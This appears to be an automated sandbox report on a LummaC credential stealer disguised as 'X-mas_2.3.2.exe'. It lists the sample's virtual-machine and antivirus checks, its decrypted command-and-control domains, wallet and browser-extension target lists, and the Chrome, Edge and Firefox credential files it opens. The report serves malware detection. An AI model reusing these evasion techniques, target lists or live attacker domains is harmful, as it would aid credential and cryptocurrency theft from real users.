Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe TID: 5344

Thread sleep time: -120000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: X-mas_2.3.2.exe, 00000000.00000003.2290893230.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: X-mas_2.3.2.exe, 00000000.00000002.2578282722.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2278590406.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2343827885.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2317946909.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2332836527.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2319028113.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: X-mas_2.3.2.exe, 00000000.00000003.2290893230.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: X-mas_2.3.2.exe, 00000000.00000002.2578282722.000000000059D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: X-mas_2.3.2.exe, 00000000.00000003.2290978696.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

Code function: 0_2_0043D910 LdrInitializeThunk,

0_2_0043D910

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00510083 push dword ptr fs:[00000030h]	0_2_00510083
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020E092B mov eax, dword ptr fs:[00000030h]	0_2_020E092B
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020E0D90 mov eax, dword ptr fs:[00000030h]	0_2_020E0D90

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: X-mas_2.3.2.exe	String found in binary or memory: tirepublicerj.shop
Source: X-mas_2.3.2.exe	String found in binary or memory: framekgirus.shop
Source: X-mas_2.3.2.exe	String found in binary or memory: wholersorie.shop
Source: X-mas_2.3.2.exe	String found in binary or memory: abruptyopsn.shop
Source: X-mas_2.3.2.exe	String found in binary or memory: nearycrepso.shop
Source: X-mas_2.3.2.exe	String found in binary or memory: begguinnerz.biz
Source: X-mas_2.3.2.exe	String found in binary or memory: cloudewahsj.shop
Source: X-mas_2.3.2.exe	String found in binary or memory: rabidcowse.shop
Source: X-mas_2.3.2.exe	String found in binary or memory: noisycuttej.shop

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

Code function: 0_2_00438040 cpuid

0_2_00438040

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: X-mas_2.3.2.exe, 00000000.00000002.2578282722.0000000000636000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: X-mas_2.3.2.exe PID: 3140, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: X-mas_2.3.2.exe, 00000000.00000002.2578282722.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: X-mas_2.3.2.exe, 00000000.00000002.2578282722.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: X-mas_2.3.2.exe, 00000000.00000002.2578282722.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: X-mas_2.3.2.exe, 00000000.00000002.2578282722.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: nocfeofbddgcijnmhnfnkdnaad","ez":"Coinbase","ldb":true},{"en":"hpglfhgfnhbgpjdenjgmdgoeiappafln","ez":"Guarda"},{"en":"blnieiiffboillknjnepogjhkgnoapac","ez":"EQUA"},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkj
Source: X-mas_2.3.2.exe, 00000000.00000002.2578282722.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs"D
Source: X-mas_2.3.2.exe, 00000000.00000002.2578282722.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: :"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"o
Source: X-mas_2.3.2.exe, 00000000.00000002.2578282722.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: X-mas_2.3.2.exe, 00000000.00000003.2317946909.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: X-mas_2.3.2.exe, 00000000.00000002.2578282722.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
